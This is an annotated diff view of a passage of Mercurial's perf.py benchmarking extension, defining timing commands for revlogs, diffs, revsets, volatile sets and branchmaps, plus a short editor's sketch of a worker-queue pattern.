810 820 raise error.Abort("repo needs %d commits for this test" % count)
811 821 repo = repo.unfiltered()
812 822 nl = [repo.changelog.node(i) for i in xrange(count)]
813 823 def d():
814 824 for n in nl:
815 825 repo.changelog.parents(n)
816 826 timer(d)
817 827 fm.end()
818 828
819 829 @command('perfctxfiles', formatteropts)
820 830 def perfctxfiles(ui, repo, x, **opts):
821 831 x = int(x)
822 832 timer, fm = gettimer(ui, opts)
823 833 def d():
824 834 len(repo[x].files())
825 835 timer(d)
826 836 fm.end()
827 837
828 838 @command('perfrawfiles', formatteropts)
829 839 def perfrawfiles(ui, repo, x, **opts):
830 840 x = int(x)
831 841 timer, fm = gettimer(ui, opts)
832 842 cl = repo.changelog
833 843 def d():
834 844 len(cl.read(x)[3])
835 845 timer(d)
836 846 fm.end()
837 847
838 848 @command('perflookup', formatteropts)
839 849 def perflookup(ui, repo, rev, **opts):
840 850 timer, fm = gettimer(ui, opts)
841 851 timer(lambda: len(repo.lookup(rev)))
842 852 fm.end()
843 853
844 854 @command('perfrevrange', formatteropts)
845 855 def perfrevrange(ui, repo, *specs, **opts):
846 856 timer, fm = gettimer(ui, opts)
847 857 revrange = scmutil.revrange
848 858 timer(lambda: len(revrange(repo, specs)))
849 859 fm.end()
850 860
851 861 @command('perfnodelookup', formatteropts)
852 862 def perfnodelookup(ui, repo, rev, **opts):
853 863 timer, fm = gettimer(ui, opts)
854 864 import mercurial.revlog
855 865 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
856 866 n = scmutil.revsingle(repo, rev).node()
857 867 cl = mercurial.revlog.revlog(getsvfs(repo), "00changelog.i")
858 868 def d():
859 869 cl.rev(n)
860 870 clearcaches(cl)
861 871 timer(d)
862 872 fm.end()
863 873
864 874 @command('perflog',
865 875 [('', 'rename', False, 'ask log to follow renames')] + formatteropts)
866 876 def perflog(ui, repo, rev=None, **opts):
867 877 if rev is None:
868 878 rev = []
869 879 timer, fm = gettimer(ui, opts)
870 880 ui.pushbuffer()
871 881 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
872 882 copies=opts.get('rename')))
873 883 ui.popbuffer()
874 884 fm.end()
875 885
876 886 @command('perfmoonwalk', formatteropts)
877 887 def perfmoonwalk(ui, repo, **opts):
878 888 """benchmark walking the changelog backwards
879 889
880 890 This also loads the changelog data for each revision in the changelog.
881 891 """
882 892 timer, fm = gettimer(ui, opts)
883 893 def moonwalk():
884 894 for i in xrange(len(repo), -1, -1):
885 895 ctx = repo[i]
886 896 ctx.branch() # read changelog data (in addition to the index)
887 897 timer(moonwalk)
888 898 fm.end()
889 899
890 900 @command('perftemplating', formatteropts)
891 901 def perftemplating(ui, repo, rev=None, **opts):
892 902 if rev is None:
893 903 rev = []
894 904 timer, fm = gettimer(ui, opts)
895 905 ui.pushbuffer()
896 906 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
897 907 template='{date|shortdate} [{rev}:{node|short}]'
898 908 ' {author|person}: {desc|firstline}\n'))
899 909 ui.popbuffer()
900 910 fm.end()
901 911
902 912 @command('perfcca', formatteropts)
903 913 def perfcca(ui, repo, **opts):
904 914 timer, fm = gettimer(ui, opts)
905 915 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
906 916 fm.end()
907 917
908 918 @command('perffncacheload', formatteropts)
909 919 def perffncacheload(ui, repo, **opts):
910 920 timer, fm = gettimer(ui, opts)
911 921 s = repo.store
912 922 def d():
913 923 s.fncache._load()
914 924 timer(d)
915 925 fm.end()
916 926
917 927 @command('perffncachewrite', formatteropts)
918 928 def perffncachewrite(ui, repo, **opts):
919 929 timer, fm = gettimer(ui, opts)
920 930 s = repo.store
921 931 s.fncache._load()
922 932 lock = repo.lock()
923 933 tr = repo.transaction('perffncachewrite')
924 934 def d():
925 935 s.fncache._dirty = True
926 936 s.fncache.write(tr)
927 937 timer(d)
928 938 tr.close()
929 939 lock.release()
930 940 fm.end()
931 941
932 942 @command('perffncacheencode', formatteropts)
933 943 def perffncacheencode(ui, repo, **opts):
934 944 timer, fm = gettimer(ui, opts)
935 945 s = repo.store
936 946 s.fncache._load()
937 947 def d():
938 948 for p in s.fncache.entries:
939 949 s.encode(p)
940 950 timer(d)
941 951 fm.end()
942 952
943 953 def _bdiffworker(q, blocks, xdiff, ready, done):
944 954 while not done.is_set():
945 955 pair = q.get()
946 956 while pair is not None:
947 957 if xdiff:
948 958 mdiff.bdiff.xdiffblocks(*pair)
949 959 elif blocks:
950 960 mdiff.bdiff.blocks(*pair)
951 961 else:
952 962 mdiff.textdiff(*pair)
953 963 q.task_done()
954 964 pair = q.get()
955 965 q.task_done() # for the None one
956 966 with ready:
957 967 ready.wait()
958 968
959 969 @command('perfbdiff', revlogopts + formatteropts + [
960 970 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
961 971 ('', 'alldata', False, 'test bdiffs for all associated revisions'),
962 972 ('', 'threads', 0, 'number of threads to use (disable with 0)'),
963 973 ('', 'blocks', False, 'test computing diffs into blocks'),
964 974 ('', 'xdiff', False, 'use xdiff algorithm'),
965 975 ],
966 976
967 977 '-c|-m|FILE REV')
968 978 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
969 979 """benchmark a bdiff between revisions
970 980
971 981 By default, benchmark a bdiff between its delta parent and itself.
972 982
973 983 With ``--count``, benchmark bdiffs between delta parents and self for N
974 984 revisions starting at the specified revision.
975 985
976 986 With ``--alldata``, assume the requested revision is a changeset and
977 987 measure bdiffs for all changes related to that changeset (manifest
978 988 and filelogs).
979 989 """
980 990 opts = pycompat.byteskwargs(opts)
981 991
982 992 if opts['xdiff'] and not opts['blocks']:
983 993 raise error.CommandError('perfbdiff', '--xdiff requires --blocks')
984 994
985 995 if opts['alldata']:
986 996 opts['changelog'] = True
987 997
988 998 if opts.get('changelog') or opts.get('manifest'):
989 999 file_, rev = None, file_
990 1000 elif rev is None:
991 1001 raise error.CommandError('perfbdiff', 'invalid arguments')
992 1002
993 1003 blocks = opts['blocks']
994 1004 xdiff = opts['xdiff']
995 1005 textpairs = []
996 1006
997 1007 r = cmdutil.openrevlog(repo, 'perfbdiff', file_, opts)
998 1008
999 1009 startrev = r.rev(r.lookup(rev))
1000 1010 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1001 1011 if opts['alldata']:
1002 1012 # Load revisions associated with changeset.
1003 1013 ctx = repo[rev]
1004 1014 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1005 1015 for pctx in ctx.parents():
1006 1016 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1007 1017 textpairs.append((pman, mtext))
1008 1018
1009 1019 # Load filelog revisions by iterating manifest delta.
1010 1020 man = ctx.manifest()
1011 1021 pman = ctx.p1().manifest()
1012 1022 for filename, change in pman.diff(man).items():
1013 1023 fctx = repo.file(filename)
1014 1024 f1 = fctx.revision(change[0][0] or -1)
1015 1025 f2 = fctx.revision(change[1][0] or -1)
1016 1026 textpairs.append((f1, f2))
1017 1027 else:
1018 1028 dp = r.deltaparent(rev)
1019 1029 textpairs.append((r.revision(dp), r.revision(rev)))
1020 1030
1021 1031 withthreads = threads > 0
1022 1032 if not withthreads:
1023 1033 def d():
1024 1034 for pair in textpairs:
1025 1035 if xdiff:
1026 1036 mdiff.bdiff.xdiffblocks(*pair)
1027 1037 elif blocks:
1028 1038 mdiff.bdiff.blocks(*pair)
1029 1039 else:
1030 1040 mdiff.textdiff(*pair)
1031 1041 else:
1032 q = util.queue()
1042 q = pycompat.queue.Queue()
1033 1043 for i in xrange(threads):
1034 1044 q.put(None)
1035 1045 ready = threading.Condition()
1036 1046 done = threading.Event()
1037 1047 for i in xrange(threads):
1038 1048 threading.Thread(target=_bdiffworker,
1039 1049 args=(q, blocks, xdiff, ready, done)).start()
1040 1050 q.join()
1041 1051 def d():
1042 1052 for pair in textpairs:
1043 1053 q.put(pair)
1044 1054 for i in xrange(threads):
1045 1055 q.put(None)
1046 1056 with ready:
1047 1057 ready.notify_all()
1048 1058 q.join()
1049 1059 timer, fm = gettimer(ui, opts)
1050 1060 timer(d)
1051 1061 fm.end()
1052 1062
1053 1063 if withthreads:
1054 1064 done.set()
1055 1065 for i in xrange(threads):
1056 1066 q.put(None)
1057 1067 with ready:
1058 1068 ready.notify_all()
1059 1069
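# [Editor's sketch] The threaded path above is a standard producer/consumer
# setup: one sentinel (None) per worker shuts the pool down, and q.join()
# blocks until every put() has a matching task_done(). A self-contained
# stdlib version of the same pattern ('process' and 'items' are illustrative
# placeholders, not perf.py names):

import queue
import threading

def worker(q, process):
    while True:
        item = q.get()
        if item is None:      # sentinel: stop this worker
            q.task_done()
            return
        process(item)
        q.task_done()

def runpool(items, process, nthreads=4):
    q = queue.Queue()
    for _ in range(nthreads):
        threading.Thread(target=worker, args=(q, process)).start()
    for item in items:
        q.put(item)
    for _ in range(nthreads):
        q.put(None)           # one sentinel per worker
    q.join()                  # wait for all items and sentinels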
1060 1070 @command('perfunidiff', revlogopts + formatteropts + [
1061 1071 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
1062 1072 ('', 'alldata', False, 'test unidiffs for all associated revisions'),
1063 1073 ], '-c|-m|FILE REV')
1064 1074 def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
1065 1075 """benchmark a unified diff between revisions
1066 1076
1067 1077 This doesn't include any copy tracing - it's just a unified diff
1068 1078 of the texts.
1069 1079
1070 1080 By default, benchmark a diff between its delta parent and itself.
1071 1081
1072 1082 With ``--count``, benchmark diffs between delta parents and self for N
1073 1083 revisions starting at the specified revision.
1074 1084
1075 1085 With ``--alldata``, assume the requested revision is a changeset and
1076 1086 measure diffs for all changes related to that changeset (manifest
1077 1087 and filelogs).
1078 1088 """
1079 1089 if opts['alldata']:
1080 1090 opts['changelog'] = True
1081 1091
1082 1092 if opts.get('changelog') or opts.get('manifest'):
1083 1093 file_, rev = None, file_
1084 1094 elif rev is None:
1085 1095 raise error.CommandError('perfunidiff', 'invalid arguments')
1086 1096
1087 1097 textpairs = []
1088 1098
1089 1099 r = cmdutil.openrevlog(repo, 'perfunidiff', file_, opts)
1090 1100
1091 1101 startrev = r.rev(r.lookup(rev))
1092 1102 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1093 1103 if opts['alldata']:
1094 1104 # Load revisions associated with changeset.
1095 1105 ctx = repo[rev]
1096 1106 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1097 1107 for pctx in ctx.parents():
1098 1108 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1099 1109 textpairs.append((pman, mtext))
1100 1110
1101 1111 # Load filelog revisions by iterating manifest delta.
1102 1112 man = ctx.manifest()
1103 1113 pman = ctx.p1().manifest()
1104 1114 for filename, change in pman.diff(man).items():
1105 1115 fctx = repo.file(filename)
1106 1116 f1 = fctx.revision(change[0][0] or -1)
1107 1117 f2 = fctx.revision(change[1][0] or -1)
1108 1118 textpairs.append((f1, f2))
1109 1119 else:
1110 1120 dp = r.deltaparent(rev)
1111 1121 textpairs.append((r.revision(dp), r.revision(rev)))
1112 1122
1113 1123 def d():
1114 1124 for left, right in textpairs:
1115 1125 # The date strings don't matter, so we pass empty strings.
1116 1126 headerlines, hunks = mdiff.unidiff(
1117 1127 left, '', right, '', 'left', 'right', binary=False)
1118 1128 # consume iterators in roughly the way patch.py does
1119 1129 b'\n'.join(headerlines)
1120 1130 b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
1121 1131 timer, fm = gettimer(ui, opts)
1122 1132 timer(d)
1123 1133 fm.end()
1124 1134
1125 1135 @command('perfdiffwd', formatteropts)
1126 1136 def perfdiffwd(ui, repo, **opts):
1127 1137 """Profile diff of working directory changes"""
1128 1138 timer, fm = gettimer(ui, opts)
1129 1139 options = {
1130 1140 'w': 'ignore_all_space',
1131 1141 'b': 'ignore_space_change',
1132 1142 'B': 'ignore_blank_lines',
1133 1143 }
1134 1144
1135 1145 for diffopt in ('', 'w', 'b', 'B', 'wB'):
1136 1146 opts = dict((options[c], '1') for c in diffopt)
1137 1147 def d():
1138 1148 ui.pushbuffer()
1139 1149 commands.diff(ui, repo, **opts)
1140 1150 ui.popbuffer()
1141 1151 title = 'diffopts: %s' % (diffopt and ('-' + diffopt) or 'none')
1142 1152 timer(d, title)
1143 1153 fm.end()
1144 1154
1145 1155 @command('perfrevlogindex', revlogopts + formatteropts,
1146 1156 '-c|-m|FILE')
1147 1157 def perfrevlogindex(ui, repo, file_=None, **opts):
1148 1158 """Benchmark operations against a revlog index.
1149 1159
1150 1160 This tests constructing a revlog instance, reading index data,
1151 1161 parsing index data, and performing various operations related to
1152 1162 index data.
1153 1163 """
1154 1164
1155 1165 rl = cmdutil.openrevlog(repo, 'perfrevlogindex', file_, opts)
1156 1166
1157 1167 opener = getattr(rl, 'opener') # trick linter
1158 1168 indexfile = rl.indexfile
1159 1169 data = opener.read(indexfile)
1160 1170
1161 1171 header = struct.unpack('>I', data[0:4])[0]
1162 1172 version = header & 0xFFFF
1163 1173 if version == 1:
1164 1174 revlogio = revlog.revlogio()
1165 1175 inline = header & (1 << 16)
1166 1176 else:
1167 1177 raise error.Abort(('unsupported revlog version: %d') % version)
1168 1178
1169 1179 rllen = len(rl)
1170 1180
1171 1181 node0 = rl.node(0)
1172 1182 node25 = rl.node(rllen // 4)
1173 1183 node50 = rl.node(rllen // 2)
1174 1184 node75 = rl.node(rllen // 4 * 3)
1175 1185 node100 = rl.node(rllen - 1)
1176 1186
1177 1187 allrevs = range(rllen)
1178 1188 allrevsrev = list(reversed(allrevs))
1179 1189 allnodes = [rl.node(rev) for rev in range(rllen)]
1180 1190 allnodesrev = list(reversed(allnodes))
1181 1191
1182 1192 def constructor():
1183 1193 revlog.revlog(opener, indexfile)
1184 1194
1185 1195 def read():
1186 1196 with opener(indexfile) as fh:
1187 1197 fh.read()
1188 1198
1189 1199 def parseindex():
1190 1200 revlogio.parseindex(data, inline)
1191 1201
1192 1202 def getentry(revornode):
1193 1203 index = revlogio.parseindex(data, inline)[0]
1194 1204 index[revornode]
1195 1205
1196 1206 def getentries(revs, count=1):
1197 1207 index = revlogio.parseindex(data, inline)[0]
1198 1208
1199 1209 for i in range(count):
1200 1210 for rev in revs:
1201 1211 index[rev]
1202 1212
1203 1213 def resolvenode(node):
1204 1214 nodemap = revlogio.parseindex(data, inline)[1]
1205 1215 # This only works for the C code.
1206 1216 if nodemap is None:
1207 1217 return
1208 1218
1209 1219 try:
1210 1220 nodemap[node]
1211 1221 except error.RevlogError:
1212 1222 pass
1213 1223
1214 1224 def resolvenodes(nodes, count=1):
1215 1225 nodemap = revlogio.parseindex(data, inline)[1]
1216 1226 if nodemap is None:
1217 1227 return
1218 1228
1219 1229 for i in range(count):
1220 1230 for node in nodes:
1221 1231 try:
1222 1232 nodemap[node]
1223 1233 except error.RevlogError:
1224 1234 pass
1225 1235
1226 1236 benches = [
1227 1237 (constructor, 'revlog constructor'),
1228 1238 (read, 'read'),
1229 1239 (parseindex, 'create index object'),
1230 1240 (lambda: getentry(0), 'retrieve index entry for rev 0'),
1231 1241 (lambda: resolvenode('a' * 20), 'look up missing node'),
1232 1242 (lambda: resolvenode(node0), 'look up node at rev 0'),
1233 1243 (lambda: resolvenode(node25), 'look up node at 1/4 len'),
1234 1244 (lambda: resolvenode(node50), 'look up node at 1/2 len'),
1235 1245 (lambda: resolvenode(node75), 'look up node at 3/4 len'),
1236 1246 (lambda: resolvenode(node100), 'look up node at tip'),
1237 1247 # 2x variation is to measure caching impact.
1238 1248 (lambda: resolvenodes(allnodes),
1239 1249 'look up all nodes (forward)'),
1240 1250 (lambda: resolvenodes(allnodes, 2),
1241 1251 'look up all nodes 2x (forward)'),
1242 1252 (lambda: resolvenodes(allnodesrev),
1243 1253 'look up all nodes (reverse)'),
1244 1254 (lambda: resolvenodes(allnodesrev, 2),
1245 1255 'look up all nodes 2x (reverse)'),
1246 1256 (lambda: getentries(allrevs),
1247 1257 'retrieve all index entries (forward)'),
1248 1258 (lambda: getentries(allrevs, 2),
1249 1259 'retrieve all index entries 2x (forward)'),
1250 1260 (lambda: getentries(allrevsrev),
1251 1261 'retrieve all index entries (reverse)'),
1252 1262 (lambda: getentries(allrevsrev, 2),
1253 1263 'retrieve all index entries 2x (reverse)'),
1254 1264 ]
1255 1265
1256 1266 for fn, title in benches:
1257 1267 timer, fm = gettimer(ui, opts)
1258 1268 timer(fn, title=title)
1259 1269 fm.end()
1260 1270
1261 1271 @command('perfrevlogrevisions', revlogopts + formatteropts +
1262 1272 [('d', 'dist', 100, 'distance between the revisions'),
1263 1273 ('s', 'startrev', 0, 'revision to start reading at'),
1264 1274 ('', 'reverse', False, 'read in reverse')],
1265 1275 '-c|-m|FILE')
1266 1276 def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
1267 1277 **opts):
1268 1278 """Benchmark reading a series of revisions from a revlog.
1269 1279
1270 1280 By default, we read every ``-d/--dist`` revision from 0 to tip of
1271 1281 the specified revlog.
1272 1282
1273 1283 The start revision can be defined via ``-s/--startrev``.
1274 1284 """
1275 1285 rl = cmdutil.openrevlog(repo, 'perfrevlogrevisions', file_, opts)
1276 1286 rllen = getlen(ui)(rl)
1277 1287
1278 1288 def d():
1279 1289 rl.clearcaches()
1280 1290
1281 1291 beginrev = startrev
1282 1292 endrev = rllen
1283 1293 dist = opts['dist']
1284 1294
1285 1295 if reverse:
1286 1296 beginrev, endrev = endrev, beginrev
1287 1297 dist = -1 * dist
1288 1298
1289 1299 for x in xrange(beginrev, endrev, dist):
1290 1300 # Old revlog versions don't support passing an int to revision().
1291 1301 n = rl.node(x)
1292 1302 rl.revision(n)
1293 1303
1294 1304 timer, fm = gettimer(ui, opts)
1295 1305 timer(d)
1296 1306 fm.end()
1297 1307
1298 1308 @command('perfrevlogchunks', revlogopts + formatteropts +
1299 1309 [('e', 'engines', '', 'compression engines to use'),
1300 1310 ('s', 'startrev', 0, 'revision to start at')],
1301 1311 '-c|-m|FILE')
1302 1312 def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
1303 1313 """Benchmark operations on revlog chunks.
1304 1314
1305 1315 Logically, each revlog is a collection of fulltext revisions. However,
1306 1316 stored within each revlog are "chunks" of possibly compressed data. This
1307 1317 data needs to be read and decompressed or compressed and written.
1308 1318
1309 1319 This command measures the time it takes to read+decompress and recompress
1310 1320 chunks in a revlog. It effectively isolates I/O and compression performance.
1311 1321 For measurements of higher-level operations like resolving revisions,
1312 1322 see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
1313 1323 """
1314 1324 rl = cmdutil.openrevlog(repo, 'perfrevlogchunks', file_, opts)
1315 1325
1316 1326 # _chunkraw was renamed to _getsegmentforrevs.
1317 1327 try:
1318 1328 segmentforrevs = rl._getsegmentforrevs
1319 1329 except AttributeError:
1320 1330 segmentforrevs = rl._chunkraw
1321 1331
1322 1332 # Verify engines argument.
1323 1333 if engines:
1324 1334 engines = set(e.strip() for e in engines.split(','))
1325 1335 for engine in engines:
1326 1336 try:
1327 1337 util.compressionengines[engine]
1328 1338 except KeyError:
1329 1339 raise error.Abort('unknown compression engine: %s' % engine)
1330 1340 else:
1331 1341 engines = []
1332 1342 for e in util.compengines:
1333 1343 engine = util.compengines[e]
1334 1344 try:
1335 1345 if engine.available():
1336 1346 engine.revlogcompressor().compress('dummy')
1337 1347 engines.append(e)
1338 1348 except NotImplementedError:
1339 1349 pass
1340 1350
1341 1351 revs = list(rl.revs(startrev, len(rl) - 1))
1342 1352
1343 1353 def rlfh(rl):
1344 1354 if rl._inline:
1345 1355 return getsvfs(repo)(rl.indexfile)
1346 1356 else:
1347 1357 return getsvfs(repo)(rl.datafile)
1348 1358
1349 1359 def doread():
1350 1360 rl.clearcaches()
1351 1361 for rev in revs:
1352 1362 segmentforrevs(rev, rev)
1353 1363
1354 1364 def doreadcachedfh():
1355 1365 rl.clearcaches()
1356 1366 fh = rlfh(rl)
1357 1367 for rev in revs:
1358 1368 segmentforrevs(rev, rev, df=fh)
1359 1369
1360 1370 def doreadbatch():
1361 1371 rl.clearcaches()
1362 1372 segmentforrevs(revs[0], revs[-1])
1363 1373
1364 1374 def doreadbatchcachedfh():
1365 1375 rl.clearcaches()
1366 1376 fh = rlfh(rl)
1367 1377 segmentforrevs(revs[0], revs[-1], df=fh)
1368 1378
1369 1379 def dochunk():
1370 1380 rl.clearcaches()
1371 1381 fh = rlfh(rl)
1372 1382 for rev in revs:
1373 1383 rl._chunk(rev, df=fh)
1374 1384
1375 1385 chunks = [None]
1376 1386
1377 1387 def dochunkbatch():
1378 1388 rl.clearcaches()
1379 1389 fh = rlfh(rl)
1380 1390 # Save chunks as a side-effect.
1381 1391 chunks[0] = rl._chunks(revs, df=fh)
1382 1392
1383 1393 def docompress(compressor):
1384 1394 rl.clearcaches()
1385 1395
1386 1396 try:
1387 1397 # Swap in the requested compression engine.
1388 1398 oldcompressor = rl._compressor
1389 1399 rl._compressor = compressor
1390 1400 for chunk in chunks[0]:
1391 1401 rl.compress(chunk)
1392 1402 finally:
1393 1403 rl._compressor = oldcompressor
1394 1404
1395 1405 benches = [
1396 1406 (lambda: doread(), 'read'),
1397 1407 (lambda: doreadcachedfh(), 'read w/ reused fd'),
1398 1408 (lambda: doreadbatch(), 'read batch'),
1399 1409 (lambda: doreadbatchcachedfh(), 'read batch w/ reused fd'),
1400 1410 (lambda: dochunk(), 'chunk'),
1401 1411 (lambda: dochunkbatch(), 'chunk batch'),
1402 1412 ]
1403 1413
1404 1414 for engine in sorted(engines):
1405 1415 compressor = util.compengines[engine].revlogcompressor()
1406 1416 benches.append((functools.partial(docompress, compressor),
1407 1417 'compress w/ %s' % engine))
1408 1418
1409 1419 for fn, title in benches:
1410 1420 timer, fm = gettimer(ui, opts)
1411 1421 timer(fn, title=title)
1412 1422 fm.end()
1413 1423
1414 1424 @command('perfrevlogrevision', revlogopts + formatteropts +
1415 1425 [('', 'cache', False, 'use caches instead of clearing')],
1416 1426 '-c|-m|FILE REV')
1417 1427 def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
1418 1428 """Benchmark obtaining a revlog revision.
1419 1429
1420 1430 Obtaining a revlog revision consists of roughly the following steps:
1421 1431
1422 1432 1. Compute the delta chain
1423 1433 2. Obtain the raw chunks for that delta chain
1424 1434 3. Decompress each raw chunk
1425 1435 4. Apply binary patches to obtain fulltext
1426 1436 5. Verify hash of fulltext
1427 1437
1428 1438 This command measures the time spent in each of these phases.
1429 1439 """
1430 1440 if opts.get('changelog') or opts.get('manifest'):
1431 1441 file_, rev = None, file_
1432 1442 elif rev is None:
1433 1443 raise error.CommandError('perfrevlogrevision', 'invalid arguments')
1434 1444
1435 1445 r = cmdutil.openrevlog(repo, 'perfrevlogrevision', file_, opts)
1436 1446
1437 1447 # _chunkraw was renamed to _getsegmentforrevs.
1438 1448 try:
1439 1449 segmentforrevs = r._getsegmentforrevs
1440 1450 except AttributeError:
1441 1451 segmentforrevs = r._chunkraw
1442 1452
1443 1453 node = r.lookup(rev)
1444 1454 rev = r.rev(node)
1445 1455
1446 1456 def getrawchunks(data, chain):
1447 1457 start = r.start
1448 1458 length = r.length
1449 1459 inline = r._inline
1450 1460 iosize = r._io.size
1451 1461 buffer = util.buffer
1452 1462 offset = start(chain[0])
1453 1463
1454 1464 chunks = []
1455 1465 ladd = chunks.append
1456 1466
1457 1467 for rev in chain:
1458 1468 chunkstart = start(rev)
1459 1469 if inline:
1460 1470 chunkstart += (rev + 1) * iosize
1461 1471 chunklength = length(rev)
1462 1472 ladd(buffer(data, chunkstart - offset, chunklength))
1463 1473
1464 1474 return chunks
1465 1475
1466 1476 def dodeltachain(rev):
1467 1477 if not cache:
1468 1478 r.clearcaches()
1469 1479 r._deltachain(rev)
1470 1480
1471 1481 def doread(chain):
1472 1482 if not cache:
1473 1483 r.clearcaches()
1474 1484 segmentforrevs(chain[0], chain[-1])
1475 1485
1476 1486 def dorawchunks(data, chain):
1477 1487 if not cache:
1478 1488 r.clearcaches()
1479 1489 getrawchunks(data, chain)
1480 1490
1481 1491 def dodecompress(chunks):
1482 1492 decomp = r.decompress
1483 1493 for chunk in chunks:
1484 1494 decomp(chunk)
1485 1495
1486 1496 def dopatch(text, bins):
1487 1497 if not cache:
1488 1498 r.clearcaches()
1489 1499 mdiff.patches(text, bins)
1490 1500
1491 1501 def dohash(text):
1492 1502 if not cache:
1493 1503 r.clearcaches()
1494 1504 r.checkhash(text, node, rev=rev)
1495 1505
1496 1506 def dorevision():
1497 1507 if not cache:
1498 1508 r.clearcaches()
1499 1509 r.revision(node)
1500 1510
1501 1511 chain = r._deltachain(rev)[0]
1502 1512 data = segmentforrevs(chain[0], chain[-1])[1]
1503 1513 rawchunks = getrawchunks(data, chain)
1504 1514 bins = r._chunks(chain)
1505 1515 text = str(bins[0])
1506 1516 bins = bins[1:]
1507 1517 text = mdiff.patches(text, bins)
1508 1518
1509 1519 benches = [
1510 1520 (lambda: dorevision(), 'full'),
1511 1521 (lambda: dodeltachain(rev), 'deltachain'),
1512 1522 (lambda: doread(chain), 'read'),
1513 1523 (lambda: dorawchunks(data, chain), 'rawchunks'),
1514 1524 (lambda: dodecompress(rawchunks), 'decompress'),
1515 1525 (lambda: dopatch(text, bins), 'patch'),
1516 1526 (lambda: dohash(text), 'hash'),
1517 1527 ]
1518 1528
1519 1529 for fn, title in benches:
1520 1530 timer, fm = gettimer(ui, opts)
1521 1531 timer(fn, title=title)
1522 1532 fm.end()
1523 1533
1524 1534 @command('perfrevset',
1525 1535 [('C', 'clear', False, 'clear volatile cache between each call.'),
1526 1536 ('', 'contexts', False, 'obtain changectx for each revision')]
1527 1537 + formatteropts, "REVSET")
1528 1538 def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
1529 1539 """benchmark the execution time of a revset
1530 1540
1531 1541 Use the --clear option if you need to evaluate the impact of building the
1532 1542 volatile revision set caches on revset execution. The volatile caches hold
1533 1543 filtering- and obsolescence-related data."""
1534 1544 timer, fm = gettimer(ui, opts)
1535 1545 def d():
1536 1546 if clear:
1537 1547 repo.invalidatevolatilesets()
1538 1548 if contexts:
1539 1549 for ctx in repo.set(expr): pass
1540 1550 else:
1541 1551 for r in repo.revs(expr): pass
1542 1552 timer(d)
1543 1553 fm.end()
1544 1554
1545 1555 @command('perfvolatilesets',
1546 1556 [('', 'clear-obsstore', False, 'drop obsstore between each call.'),
1547 1557 ] + formatteropts)
1548 1558 def perfvolatilesets(ui, repo, *names, **opts):
1549 1559 """benchmark the computation of various volatile set
1550 1560
1551 1561 Volatile set computes element related to filtering and obsolescence."""
1552 1562 timer, fm = gettimer(ui, opts)
1553 1563 repo = repo.unfiltered()
1554 1564
1555 1565 def getobs(name):
1556 1566 def d():
1557 1567 repo.invalidatevolatilesets()
1558 1568 if opts['clear_obsstore']:
1559 1569 clearfilecache(repo, 'obsstore')
1560 1570 obsolete.getrevs(repo, name)
1561 1571 return d
1562 1572
1563 1573 allobs = sorted(obsolete.cachefuncs)
1564 1574 if names:
1565 1575 allobs = [n for n in allobs if n in names]
1566 1576
1567 1577 for name in allobs:
1568 1578 timer(getobs(name), title=name)
1569 1579
1570 1580 def getfiltered(name):
1571 1581 def d():
1572 1582 repo.invalidatevolatilesets()
1573 1583 if opts['clear_obsstore']:
1574 1584 clearfilecache(repo, 'obsstore')
1575 1585 repoview.filterrevs(repo, name)
1576 1586 return d
1577 1587
1578 1588 allfilter = sorted(repoview.filtertable)
1579 1589 if names:
1580 1590 allfilter = [n for n in allfilter if n in names]
1581 1591
1582 1592 for name in allfilter:
1583 1593 timer(getfiltered(name), title=name)
1584 1594 fm.end()
1585 1595
1586 1596 @command('perfbranchmap',
1587 1597 [('f', 'full', False,
1588 1598 'Includes build time of subset'),
1589 1599 ('', 'clear-revbranch', False,
1590 1600 'purge the revbranch cache between computation'),
1591 1601 ] + formatteropts)
1592 1602 def perfbranchmap(ui, repo, *filternames, **opts):
1593 1603 """benchmark the update of a branchmap
1594 1604
1595 1605 This benchmarks the full repo.branchmap() call with branchmap cache reads and writes disabled.
1596 1606 """
1597 1607 full = opts.get("full", False)
1598 1608 clear_revbranch = opts.get("clear_revbranch", False)
1599 1609 timer, fm = gettimer(ui, opts)
1600 1610 def getbranchmap(filtername):
1601 1611 """generate a benchmark function for the filtername"""
1602 1612 if filtername is None:
1603 1613 view = repo
1604 1614 else:
1605 1615 view = repo.filtered(filtername)
1606 1616 def d():
1607 1617 if clear_revbranch:
1608 1618 repo.revbranchcache()._clear()
1609 1619 if full:
1610 1620 view._branchcaches.clear()
1611 1621 else:
1612 1622 view._branchcaches.pop(filtername, None)
1613 1623 view.branchmap()
1614 1624 return d
1615 1625 # add filter in smaller subset to bigger subset
1616 1626 possiblefilters = set(repoview.filtertable)
1617 1627 if filternames:
1618 1628 possiblefilters &= set(filternames)
1619 1629 subsettable = getbranchmapsubsettable()
1620 1630 allfilters = []
1621 1631 while possiblefilters:
1622 1632 for name in possiblefilters:
1623 1633 subset = subsettable.get(name)
1624 1634 if subset not in possiblefilters:
1625 1635 break
1626 1636 else:
1627 1637 assert False, 'subset cycle %s!' % possiblefilters
1628 1638 allfilters.append(name)
1629 1639 possiblefilters.remove(name)
1630 1640
1631 1641 # warm the cache
1632 1642 if not full:
1633 1643 for name in allfilters:
1634 1644 repo.filtered(name).branchmap()
1635 1645 if not filternames or 'unfiltered' in filternames:
1636 1646 # add unfiltered
1637 1647 allfilters.append(None)
1638 1648
1639 1649 branchcacheread = safeattrsetter(branchmap, 'read')
1640 1650 branchcachewrite = safeattrsetter(branchmap.branchcache, 'write')
1641 1651 branchcacheread.set(lambda repo: None)
1642 1652 branchcachewrite.set(lambda bc, repo: None)
